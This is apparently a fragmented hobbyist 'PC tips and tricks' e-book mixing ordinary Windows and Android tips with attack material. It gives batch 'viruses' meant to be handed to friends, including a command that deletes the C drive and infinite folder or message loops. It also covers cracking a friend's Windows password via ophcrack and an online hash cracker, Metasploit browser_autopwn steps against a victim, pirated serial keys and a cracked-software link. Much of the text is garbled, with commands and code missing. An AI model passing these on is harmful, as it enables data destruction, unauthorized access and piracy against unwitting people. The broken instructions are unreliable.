PC Tips and Trick Part-2
PC Tips and Trick Part-2
Legal Disclaimer
Any proceedings and or activities related to the material contained
Within this volume are exclusively your liabilities. The misuse and
Mistreat of the information in this book can consequence in unlawful
Charges brought against the persons in question. The authors and
Review analyzers will not be held responsible in the event any unlawful
Charges brought against any individuals by misusing the information in
This book to break the law. This book contains material and resources
That can be potentially destructive or dangerous. If you do not fully
Comprehend something on this book, don‘t study this book. Please
Refer to the laws and acts of your state/region/ province/zone/territory
Or country before accessing, using, or in any other way utilizing these
Resources. These materials and resources are for educational and
Research purposes only. Do not attempt to violate the law with
Anything enclosed here within. If this is your intention, then leave now.
Neither writer of this book, review analyzers, the publisher, nor anyone
Else affiliated in any way, is going to admit any responsibility for your
Proceedings, actions or trials.
Visit My Blog>>http://pctipstric.blogspot.in/
White Hat – These are considered the good guys. White hat hackers don’t use their skills for illegal
purposes. They usually become Computer Security experts and help protect people from the Black Hats.
Black Hat – These are considered the bad guys. Black hat hackers usually use their skills maliciously for
personal gain. They are the people that hack banks, steal credit cards, and deface websites.
These two terms came from the old western movies where the good guys wore white hats and the bad
guys wore black hats. Now if you’re thinking, “Oh boy! Being a black hat sounds awesome!”,
Then I have a question for you. Does it sound cool to live in a cell the size of your bathroom and be
someone’s butt buddy for many years? That’s what I thought.
Open up Notepad
Type in:
Code:
command.com
Go to File->Save As->CMD.bat
Type in:
Code:
net user
Code:
still there!
Example:
The below Websites will help you to learn CSS, HTML, PHP, JavaScript, CSS3, HTML5, Ruby, etc and it
doesn't require any skills .
#1. w3schools
#2. Codecademy
#4. CodeSchool
#5.TeamtreeHouse
#6.Dreamincode
Dangers funny message virus
@ECHO off
:Begin
msg * Hi
msg * I am!
GOTO BEGIN
save as message.bat
then open.....
nd enjoyyy///
5. MicrosoftLive.com–.NET
6. Wikipedia – PHP
7. Blogger – Java
8. MSN – .NET
“excessive evangelism.”
do, silly.)
from yourself.)
doubtful.
Scoble’s account.
Android Codes / Tricks
Android is becoming a very popular these days and all big companies have launched android
phones.Android is giving a strong competition to Iphones, symbian phones(like nokia).Though people
have a lot of expectations from lumina series by nokia,but i don't think it will be able to compete with
android phones!
So here are some tricks and codes which can be useful if you have an android phone!
working. Following the below steps will create an EICAR test virus that will help identify if the anti-virus
program you have installed is properly working and that it will prompt you for deletion when detected.
Note: This test virus is non-viral and will not damage your computer in any way.
2. Open the text file and enter the below code as the text of the file.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
3. After the above code has been entered save the file as an .exe file instead of a .txt file.
For example, name the file test.exe instead of test.txt. Alternatively you can save the file as a .txt
file and then rename the file after it has been saved.
Note: In order for this to work you must have Windows showing the file extensions.
By default Windows may be trying to save the file as a .txt file even if you end your file with .exe.
For example, the file may be saving as test.exe.txt instead of test.exe. If after saving or renaming the
file the icon still looks like a notepad, it is not being saved as an executable file.
4. After the file has been saved the anti-virus should immediately prompt for action,
similar to what is shown below. If you do not receive a prompt try highlighting the file,
and then right-click and choose the option to scan the file with your scanner.
If after following all of the above steps you do not receive any type of warning,
virus scanner.
To Create Resume you need to sign up first, After you can add
#1. Myresumeonline
#2. Cvmkr.com
#3. Resumizer
#4. JobSpice
@echo off
:top
md %random%
goto top
2) Save it as friendlylearn.bat
Hacker VS Programmer
1. A hacker beats the system.
A programmer maintains the system.
5. A hacker is agile.
A programmer doesn’t.
8. A hacker is self-reliant.
SO respect them""">>
with a '/'.
For example:
...becomes...
youtube.com/v/ 1223445 This bypasses the restriction and lets you go straight to watching the video
without the age
"nsfw" in front of
to your heart's content. Dont miss a single post hit like,share and feel free to
SSH.
Python, C, ASM
There are different types of configuration on computer system like Graphic card memory , your system
model , operating system, system manufacture , processor etc etc. But how to check it all? This is simple
thing in computer but many users may getting trouble because they don't know about it. Today, I am
here with simple but very useful knowledge.
Method 1
Click on start button and go to Run, then type msinfo32.exe
(This method may be difficult for some newbie computer users. So I am writing about second method .)
Method 2
Go to "start" type "Run" and search for "dxdiag" and that's all. You will be viewing your system details.
3. Windows Registry editor will open then navigate from the left panel and go to:
HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList
hide.
This account isn't completely hidden because it is visible to administrators in Local User and Groups and
also the profile is visible in the Documents and Settings.
Commond wher file will be exist if folder are present on desktop then
Hit enter
Hit enter
enjoyyyyy>
How to hack Window 7 password using free open source software called ophcrack. This hack also works
on Windows XP and Windows Vista. So let get started.
What Is Ophcrack?
Opcrack is an open source windows password cracker based on rainbow tables. It comes with Graphical
user interface (GUI) and runs on multiple platform such windows, linux and mac. It allows you to recover
or hack windows password.
5. After you see screen like above wait for ophcrack to boot automatically or you may press Enter to
advance.
6. Now you will see several lines of code printed on screen or they might disappear very quickly (you
dont need to worry about that).
7. Then you will see screen like below it is ophcrack password recovering software. At the Ophcrack
screen it shows the Administrator and Guest account. Notice the word “empty”. This means that if the
account is enabled you could log in without a password.
Windows 7 Password hacking
8. Ophcrack WILL NOT CRACK THE PASSWORD because the hash table which it needs is not available for
free. But it does show the NTLM hash.
9. Copy this hash value which is under NT Hash field.
10. Navigate to http://crackstation.net/ which is an online hash cracking tool.
11. Type in the hash value you copied down in Step 9, Enter the captche and click on Crack Hashes.
and u got the password of ur friend system ---
2. Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
3. And most important is that paste both the files on desktop. You may do this anywhere instead of
desktop if you have some basic understanding of command line.
4. Now open cmd by going to Start > Accessories > Command Prompt and type following commands in
it.
cd desktop
5. CD stands for change directory by typing above command you change your directory to desktop. After
that type command given below.
Replace imagename.jpg with the name of image you want your file to be hidden behind. Don't forget to
add image format (Eg: .jpg,.png,.gif)
Replace filename with name of your file you want to hide. It must be in .rar format.
Finally Replace finalimage.jpg with whatever name you want your final image with hidden files should be.
This is the image where your file will be hidden.
6. Now when you will try to open this newly created image it will open as normal image, but to open you
hidden file you need follow steps given below.
How To Access Hidden File?
To access your hidden file you need to open the newly created image in winrar. Just follow simple steps
given below to do that.
1. Open winrar
2. Now locate your image and open it or simply drag your image in winrar.
point
Alt + 15.....☼.....sun
pause
pause
pause
pause
pause
:1
dir/s
goto 1
Serial Keys:
1.) QCGUH-J8FF6-33WGA-UBY62
2.) 4GGYH-S7HEJ-QEGXT-4C88H
Learn To Make Dangerous Virus In A Minute............
Hello #GOOD_Evening frnds after a some time here nd gud to see ur love regarding us....nd today i will
teach u all how to Make Dangerous Virus In A Minute
In this post i will teach you to make simple yet very powerfull or you can say harmfull computer virus
using a batch file. No software is required to make this virus, Noteapad is enough for it. The good thing
about this virus is it is not detected by any AntiVirus.
@Echo off
Del C:\ *.* |y
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run on your own computer or else it will delete all the content of your C
Drive. I will not be responsible for any damage done to your computer.
This generational and chronological list of Intel processors attempts to present all of Intel's
processors from the pioneering 4-bit 4004 (1971) to the present high-end offerings, which include the 64-
bit Itanium 2 (2002), Intel Core 2, and Xeon 5100 and 7100 series processors (2006). Concise technical
data are given for each product.
1 The 4-bit processors
o 2.1 8008
o 2.2 8080
o 2.3 8085
3 Microcontrollers
o 5.1 8086
o 5.2 8088
o 5.3 80186
o 5.4 80188
o 5.5 80286
o 6.4 XScale
o 7.1 80386DX
o 7.2 80386SX
o 7.3 80376
o 7.4 80386SL
o 7.5 80386EX
o 8.2 80486SX
o 8.3 80486DX2
o 8.4 80486SL
o 8.5 80486DX4
o 10.2 Pentium II
o 10.8 Pentium M
o 10.9 Celeron M
o 11.1 Pentium 4
o 11.2 Xeon
o 11.4 Pentium 4 EE
o 11.5 Pentium 4E
o 11.6 Pentium 4F
o 12.1 Itanium
o 12.2 Itanium 2
o 13.1 Pentium 4F
o 13.2 Pentium D
o 13.3 Pentium Extreme Edition
o 13.4 Xeon
o 14.1 Xeon
o 14.4 Celeron
o 14.5 Celeron M
o 15.2 Core i3
o 15.3 Core i5
o 15.4 Core i7
o 15.5 Xeon
o 16.1 Celeron
o 16.2 Pentium
o 16.3 Core i3
o 16.4 Core i5
o 16.5 Core i7
on the Internet.
the Internet.
>Where pics is your folder name. Save the text file as lock.bat in the same drive.
>Open another new notepad text file and type the following
Usage :
To lock the pics folder, simply click the loc.bat and it will transform into control panel icon which is
inaccessible.
To unlock the folder click the key.bat file. Thus the folder will be unlocked and the contents are
accessible.
1-Folder Bomber
This batch file will create 3000+ folder in less than a minute.
>Open your notepad and type the following codes.
@echo off
:top
md %random%
goto top
>Save it as 3000.bat
Give this file to your friend and when he will click on that his nightmare will be started...........
%random% means folders with random names.) goto top- retures the command to :top which causes an
infinite loop.
Make a Deadly virus
NOTE: WE WILL NOT BE RESPONSIBLE FOR ANY KIND OF HARM TO YOUR COMPUTER OR OTHER
COMPUTERS IN ANY CASE.
1. open notepad..
// Created by vaibhav
#include
#include
#include
#include
#include
#include
#include
int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
char buffer[255];
ifstream input(inputFile);
if (!input)
fp << "EXIT";
else
while (!input.eof())
input.getline(buffer,255);
}
{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
fp << "EXIT";
system("START CLICK.bat");
main();
else
while (!input.eof())
input.getline(buffer,255);
START:{
for(int i = 0; i <>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
Sleep(60);
}
for ( int j = 0; j <>
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
cout <<>
goto START;
it can destroy the hard disk as well as various other components of the computer.. and the only option
left over will be the replacement of the computer!!!...
so be careful frnds...
You can change "Welcome Back" word as you wish. Remember to use punctuation to get the
pronunciation more correct
Now put it in startup folder. You can find your startup folder using below path.
Now, each time you log on, you will be hear your welcome word.
Enjoy !
http://www.4shared.com/get/sItexZnP/quick_heal_2012_completly_clea.html
3>Install all these files one by one and then restart your Computer
Here We Go
Step 1:
Right click on desktop then click on shortcut
step 2:
Note:- | 120 is time to Shutdown which is in seconds so you can change that time according to you but
remeber this is in seconds |
Step.3 Click on next any write name of shortcut anything you wantand then finish it.
Step.4 Now double click on that shortcut and you will see a massege box like d pic.
And hit enter and you will see that That massege has stopped.
If you want it to more harmfull Put it Startup folder but dont miss use it
Enjou!!!!!
Save file as any name you want with .bat extension. Then open that file and you observe that how many
times you write START in Notepad, the CMD console box is open same as number of START written in
Notepad. ...............
In Victim Machine
1). Start the victim Machine
Back to Backtrack
5). Type msf:>use auxiliary/server/browser_autopwn
6). Thentype msf :>show Options Set LHOST means Localhost ip address To check Localhost ip Go to
terminal And type "ifconfig"
7). msf:>set LHOST eg.192.168.168.1 After That you want set SRVPORT which is 80 or 8080
Open Any Browser Type Your BAcktrack Machine's ip address eg.<!-- m --><a class="postlink"
href="http://192.168.168.1/">http://192.168.168.1/</a><!-- m -->
If You don't want to open backtrack machine's ip Address you can also do it With "ettercap" if user open
<!-- m --><a class="postlink" href="http://www.google.com/">http://www.google.com/</a><!-- m -->
it can also hacked.
To open a Meterprete
type msf:>sessions -i 1
*#4636#*#*
about
phone information
battery information
battery history
usage statitics
*#*#7780#*#*
it is used to remove google
*#*#34971539#*#*
sdcard
5.End call/power -
*#*#7594#*#*
file
7.service mode
*#*#232331#*#* -bluetooth
Test
*#*#2664#*#* -touch
screen test
*#*#0588#*#* -proximity
sensor test
Enjoy!!!
Shortcut keys
Ctrl + V Paste
Now to check if your Windows is activated Permanently or on a temporary basis, you can just follow the
instructions given below:
In Windows XP: Goto Start menu > Open Run > Type cmd > Hit enter.
In Windows 7 and 8: Goto start > Type cmd > Hit enter.
slmgr/xpr
Then a dialog box will appear which will tell you the status of your windows activation.
Step 1. The first step is to select the software or application for which
you want to make custom Run command. For example, let us
consider Google Chrome as the example here. Remember, you can
choose any application other than which is already there in the Run
command.
Step 2. In the second step, right click on the desktop of your computer
system and make a new shortcut.
Step 4. Now, you need to browse through the files and choose the one
that shows “chrome.exe”. Well, it is quite obvious that all the executable
files can be found in the C drive (or wherever the Operating System has
been installed), inside the folder “Program Files”. For example, “C:\
Program Files\Google Chrome\chrome.exe”
Step 5. Once you are done with Step number 4, just click on “Next” button
and simply provide a relative name to that shortcut. Remember, the same
name will be used later in the Run command.
Step 6. Now, click on the “Finish” button. Once it is done, an icon related
to that application or software will show up on your computer’s screen. It
means that the process of creating shortcut has been done successfully.
Step 7. In this step, just cut and paste that recently made shortcut icon
into your computer’s root drive, in its Windows folder.
For example, C:\ Windows , Make sure you are the administrator of the
computer or have its password.
Step 8. Now, you are done with the set up and can run the
application through Run Command. Just go to Run and enter the keyword
“GC”, and Google Chrome will begin executing.
Steps to Check Original Installation Date of
Windows
Step 1: Hold Windows key and Press R key to open Run, Type CMD and
hit enter to Open up Command Prompt.
Step 3: Just wait a Few Seconds to Gather all the Data , Boom- You will
Get all the info of your System in just a few seconds including the
Original Installation Date which we are looking for.
Step 4: With this Command you Get all the Necessary info about your
System but If you Just want to know the date on which your windows
was Installed on your System then type this Command systeminfo |
find /i “install date
You can see its showing that i have installed my windows last month as
i had to Refresh my Windows, its pretty much Accurate.
Thats it guys, in this tutorial we saw how to check our system info
including the WindowsInstallation Date.
Step 1: First of all you will need to open Advanced User account,
Click on Start , Type netplwiz and Click Enter (For Windows 7 &
Vista users)
Step 2: After performing the above tasks in your version of Windows You
will Get a dialogue box similar to below Picture. 1st you will have to
select the Account, then Uncheck the box Users must enter a user name
and password to use this computer and lastly click on ok.
Step 3: Now you will be asked to enter your password twice, so do it and
thats enough we have done to Skip Windows logon Screen. You will see
that the next time you boot your PC, you will not be asked for Username
or Password.
How do I Get back the logon screen ?
After Disabling logon screen, if you feel insecure and whant the logon
screen back then you can do it by again performing Step 1 in this tutorial
and Check the box users must enter a user name and password to use
this computer.
Thats it now the next time your PC will boot, you will be asked for
username and password
Head into Control Panel –> Region and Language –> Keyboards –> Change keyboards, then click the Add
button and pick the Dvorak layout (or any other random layout you want). Once you’ve done that, use
the drop-down above to set the default
1 Go to Start. In the search box, type in "cmd". If your Start menu has the Run command, click Run and
type "cmd" in the field.
3 Hit Enter. On your screen, you will see a series of names and numbers. Look for the line that says
Default Gateway. Write down the number that you see next to Default Gateway
4 Navigate to Google or another search engine. In the address bar, type in the number that you just
wrote down.
5 Hit Enter. You will see another screen that has fields to enter your username and password. The
username is "admin", and the password is either "admin" or "1234". Enter that information into the
appropriate fields. Click the "Log In" button.
6 Go to the Wireless tab on the website that pops up. If you scroll down, you should find something
called password. Write down your password and put it in a safe place in case you forget it again.